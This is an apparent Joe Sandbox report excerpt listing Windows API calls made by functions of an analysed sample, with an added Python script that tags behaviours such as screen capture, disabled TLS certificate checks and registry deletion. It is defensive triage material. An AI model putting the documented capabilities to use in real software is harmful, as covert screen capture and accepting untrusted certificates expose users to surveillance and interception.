                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
                                        • Opcode ID: 653f91300c19a5d8da2b821bf786e7e4189bc6d5f8eb0fa2c9b0d861a640c1c1
                                        • Instruction ID: 364283385e1ce015308c78a04d6d14a61a69dc3b20f1bbaff10b009061ef41dd
                                        • Opcode Fuzzy Hash: 653f91300c19a5d8da2b821bf786e7e4189bc6d5f8eb0fa2c9b0d861a640c1c1
                                        • Instruction Fuzzy Hash: FC715A30640219BEEF219F64CC89FAEBFA4FF05764F200216F6246A1E1C7B1AE14DB54
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00C86DEB
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C86E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C86E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C86E94
                                        • DestroyWindow.USER32(?), ref: 00C86EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C86EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C86EFD
                                        • GetDesktopWindow.USER32 ref: 00C86F16
                                        • GetWindowRect.USER32(00000000), ref: 00C86F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C86F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C86F4D
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 2429346358-3619404913
                                        • Opcode ID: f664cdebf786342f63fd837a93094a493d56ce004de09e5bf9bf7580560469ad
                                        • Instruction ID: eed1162ae5fdcd15bf152b9ba01379a5d752ec4a4d164c11f7da21ff721a7a76
                                        • Opcode Fuzzy Hash: f664cdebf786342f63fd837a93094a493d56ce004de09e5bf9bf7580560469ad
                                        • Instruction Fuzzy Hash: E3716C74104244AFDB21DF58DC88FBABBE9FB89308F04042DFA9987261D770E905CB19
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 00C89147
                                          • Part of subcall function 00C87674: ClientToScreen.USER32(?,?), ref: 00C8769A
                                          • Part of subcall function 00C87674: GetWindowRect.USER32(?,?), ref: 00C87710
                                          • Part of subcall function 00C87674: PtInRect.USER32(?,?,00C88B89), ref: 00C87720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C891B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C891BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C891DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C89225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89277
                                        • DragFinish.SHELL32(?), ref: 00C8927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C89371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-3440237614
                                        • Opcode ID: 803cce442ee30b258e7570c2c812d8c2e1d13682d879a05de5506a90a7c04243
                                        • Instruction ID: b55c429a1909f593c558b36a521cde742a9d30ea99d7961f6903a2a2f42f286e
                                        • Opcode Fuzzy Hash: 803cce442ee30b258e7570c2c812d8c2e1d13682d879a05de5506a90a7c04243
                                        • Instruction Fuzzy Hash: AA617D71108305AFC701EF64DC85EAFBBE8EF89750F040A2DF595931A1DB70AA49CB66
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6C4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6C4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C6C4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C6C533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6C549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6C554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6C584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6C5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6C5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 00C6C5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 3783f3223006778e84cd898096c23e1d5c4d1218d1c8f9b704202d1118919148
                                        • Instruction ID: 2e8396c5927b8134a52f6e373e5da08e3af152519a3b0f4577bc8c0f30f3d1e7
                                        • Opcode Fuzzy Hash: 3783f3223006778e84cd898096c23e1d5c4d1218d1c8f9b704202d1118919148
                                        • Instruction Fuzzy Hash: E55119B1500608AFDB219F65CDC8BBA7BFCEB08754F00441AF996D6650DB34EA44AB64
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C88592
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885AD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885BA
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885D7
                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885E0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885F8
                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C8FC38,?), ref: 00C88611
                                        • GlobalFree.KERNEL32(00000000), ref: 00C88621
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00C88641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C88671
                                        • DeleteObject.GDI32(?), ref: 00C88699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C886AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: b3ecbe9e7641c6a79fb18be1c6af319d3a2d829c7e7c33c4f95b20ea3e792e5c
                                        • Instruction ID: ed24df197c9fbfe13b161b92d4162435eba301ff5ffad91efea54444c193e31b
                                        • Opcode Fuzzy Hash: b3ecbe9e7641c6a79fb18be1c6af319d3a2d829c7e7c33c4f95b20ea3e792e5c
                                        • Instruction Fuzzy Hash: 61412775600208AFDB119FA5DC88FAE7BB9FF89B15F104059F915E72A0DB309E05DB28
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 00C61502
                                        • VariantCopy.OLEAUT32(?,?), ref: 00C6150B
                                        • VariantClear.OLEAUT32(?), ref: 00C61517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C615FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00C61657
                                        • VariantInit.OLEAUT32(?), ref: 00C61708
                                        • SysFreeString.OLEAUT32(?), ref: 00C6178C
                                        • VariantClear.OLEAUT32(?), ref: 00C617D8
                                        • VariantClear.OLEAUT32(?), ref: 00C617E7
                                        • VariantInit.OLEAUT32(00000000), ref: 00C61823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 6cd627684a4f5802e2565f616912b4bec36e52b6e3f9aa48d4c128889fb8f71d
                                        • Instruction ID: fc4a20a089dba8bcc16c383f580d7c1471cf94e9df9016b304aa997592354055
                                        • Opcode Fuzzy Hash: 6cd627684a4f5802e2565f616912b4bec36e52b6e3f9aa48d4c128889fb8f71d
                                        • Instruction Fuzzy Hash: 69D1CD31A00219EBDB209F66D8C5B7DF7B5BF44702F1C805AE906AB580EB30ED85DB61
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7B6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7B772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00C7B80A
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7B87E
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7B89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C7B8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7B904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7B922
                                        • FreeLibrary.KERNEL32(00000000), ref: 00C7B983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7B994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
                                        • Opcode ID: 7b6cf74c966dcfceabd9a2e9220932a79170513430b0ea8456b739029e1072ff
                                        • Instruction ID: 352e3e6412c3731d4f2f8c1f3142bd02f677462d71b718c450ecd22b5922a696
                                        • Opcode Fuzzy Hash: 7b6cf74c966dcfceabd9a2e9220932a79170513430b0ea8456b739029e1072ff
                                        • Instruction Fuzzy Hash: F8C16C30204201AFD714DF25C495F2ABBE5BF84358F14C59CF5AA8B2A2CB71ED49CB92
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00C725D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C725E8
                                        • CreateCompatibleDC.GDI32(?), ref: 00C725F4
                                        • SelectObject.GDI32(00000000,?), ref: 00C72601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C7266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C726AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C726D0
                                        • SelectObject.GDI32(?,?), ref: 00C726D8
                                        • DeleteObject.GDI32(?), ref: 00C726E1
                                        • DeleteDC.GDI32(?), ref: 00C726E8
                                        • ReleaseDC.USER32(00000000,?), ref: 00C726F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: e25a7b9ef98df97d3bdc2e5b8892ecfdffc56b2c6354239fca4a899be0540b2d
                                        • Instruction ID: e170435b3a3b481c5db5f0b3a6625908d98764859d9efb7cb0fe461170734fa1
                                        • Opcode Fuzzy Hash: e25a7b9ef98df97d3bdc2e5b8892ecfdffc56b2c6354239fca4a899be0540b2d
                                        • Instruction Fuzzy Hash: A161F375D00219EFCF14CFA4D884AAEBBB6FF48310F20852AE959A7250E770A941DF64
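The API listings above are raw call traces, and the security-relevant content is easy to miss when read one record at a time: the WinINet record queries and then sets option 0000001F (INTERNET_OPTION_SECURITY_FLAGS) to 00000100, which is SECURITY_FLAG_IGNORE_UNKNOWN_CA, so the HTTPS request will accept a server certificate from an untrusted CA; the GDI record (GetDC, CreateCompatibleBitmap, StretchBlt with rop 00CC0020 = SRCCOPY, GetDIBits) is a screen-to-DIB capture; the registry record deletes values and keys and resolves RegDeleteKeyExW by name through GetProcAddress. The script below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses the "APIs" lines in the format shown here and tags each function with those behaviours. The constants are the documented wininet.h values; the sample input is copied from the three listings above. One caveat for triage: a function's presence in the binary shows capability, not execution on this run, and for a runtime that ships many capabilities the static tags should be checked against the report's dynamic sections before they are reported as observed behaviour.

```python
import re
from dataclasses import dataclass

# Matches one line of a Joe Sandbox "APIs" listing, e.g.
#   • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6C549
#   • GetDesktopWindow.USER32 ref: 00C86F16
#   • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
_API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"        # API name and exporting module
    r"(?:\((?P<args>[^)]*)\))?"              # argument list; absent for some CRT calls
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"     # address of the call site
)

# Values from wininet.h. The listing sets 0x100 (IGNORE_UNKNOWN_CA) on option 0x1F.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_IGNORE_REVOCATION = 0x80
SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100
SECURITY_FLAG_IGNORE_WRONG_USAGE = 0x200
SECURITY_FLAG_IGNORE_CERT_CN_INVALID = 0x1000
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = 0x2000
_CERT_IGNORE_MASK = (SECURITY_FLAG_IGNORE_REVOCATION | SECURITY_FLAG_IGNORE_UNKNOWN_CA
                     | SECURITY_FLAG_IGNORE_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                     | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # int for 8-hex-digit values, None for '?', str for literals
    ref: int
    subcall: bool   # True for "Part of subcall function" lines


def _parse_arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None                      # value not recoverable statically
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok                           # e.g. tooltips_class32, advapi32.dll


def parse_api_lines(text):
    """Return the ApiCall records found in a block of report text, in listing order."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), "subcall function" in line))
    return calls


def tls_checks_disabled(calls):
    """Bitmask of certificate checks switched off through INTERNET_OPTION_SECURITY_FLAGS."""
    mask = 0
    for c in calls:
        if (c.api == "InternetSetOptionW" and len(c.args) >= 3
                and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS and isinstance(c.args[2], int)):
            mask |= c.args[2] & _CERT_IGNORE_MASK
    return mask


_SCREEN_CAPTURE = {"GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC", "SelectObject", "GetDIBits"}
_REG_DELETE = {"RegDeleteValueW", "RegDeleteKeyW", "RegDeleteKeyExW"}


def classify(calls):
    """Triage tags for one function, judged on its direct calls only: sub-call lines belong
    to the callee, which the report lists as its own record."""
    direct = [c for c in calls if not c.subcall]
    names = {c.api for c in direct}
    tags = set()
    if _SCREEN_CAPTURE <= names and names & {"BitBlt", "StretchBlt"}:
        tags.add("screen-capture")
    if names & {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"}:
        tags.add("http-client")
    if tls_checks_disabled(direct):
        tags.add("tls-validation-disabled")
    if names & _REG_DELETE:
        tags.add("registry-delete")
    for c in direct:                     # import resolved by name at run time
        if c.api == "GetProcAddress" and len(c.args) >= 2 and isinstance(c.args[1], str):
            tags.add("dynamic-import:" + c.args[1])
    return tags


# Sample input: lines copied from the WinINet, GDI and registry records of this report.
SAMPLE_HTTP = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6C4B0
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C6C4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C6C533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6C549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6C554
"""
SAMPLE_GDI = """\
• GetDC.USER32(00000000), ref: 00C725D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C725E8
• CreateCompatibleDC.GDI32(?), ref: 00C725F4
• SelectObject.GDI32(00000000,?), ref: 00C72601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C7266D
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C726D0
"""
SAMPLE_REG = """\
  • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
• RegDeleteValueW.ADVAPI32(?,?), ref: 00C7B80A
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C7B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7B922
"""

if __name__ == "__main__":
    for name, text in (("http", SAMPLE_HTTP), ("gdi", SAMPLE_GDI), ("reg", SAMPLE_REG)):
        print(name, sorted(classify(parse_api_lines(text))))
```

The parser treats "?" arguments as unknown rather than zero, so a rule never fires on a value the disassembler could not recover; the TLS rule in particular needs the literal flag word, which this record supplies. Extending the rule set is a matter of adding API name sets or argument checks, for instance SendMessageTimeoutW with message 00000101 or the DragQueryFileW pair in the earlier records.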
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00C2DAA1
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D659
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D66B
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D67D
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D68F
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6A1
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6B3
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6C5
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6D7
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6E9
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6FB
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D70D
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D71F
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D731
                                        • _free.LIBCMT ref: 00C2DA96
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2DAB8
                                        • _free.LIBCMT ref: 00C2DACD
                                        • _free.LIBCMT ref: 00C2DAD8
                                        • _free.LIBCMT ref: 00C2DAFA
                                        • _free.LIBCMT ref: 00C2DB0D
                                        • _free.LIBCMT ref: 00C2DB1B
                                        • _free.LIBCMT ref: 00C2DB26
                                        • _free.LIBCMT ref: 00C2DB5E
                                        • _free.LIBCMT ref: 00C2DB65
                                        • _free.LIBCMT ref: 00C2DB82
                                        • _free.LIBCMT ref: 00C2DB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 6b4ef6e51174243dcb74a8ff49b0256476a66acf677070d6eba8700273364f69
                                        • Instruction ID: c14823300babf9af60e70fc871098fe7d4356ca1beb3bf6c3b5723c826991f7d
                                        • Opcode Fuzzy Hash: 6b4ef6e51174243dcb74a8ff49b0256476a66acf677070d6eba8700273364f69
                                        • Instruction Fuzzy Hash: C6316B31604324AFEB21AB38F845B5A77E9FF24311F514419F46AD7991DF31AE80A720
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5369C
                                        • _wcslen.LIBCMT ref: 00C536A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C53797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C5380C
                                        • GetDlgCtrlID.USER32(?), ref: 00C5385D
                                        • GetWindowRect.USER32(?,?), ref: 00C53882
                                        • GetParent.USER32(?), ref: 00C538A0
                                        • ScreenToClient.USER32(00000000), ref: 00C538A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C53921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C5395D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
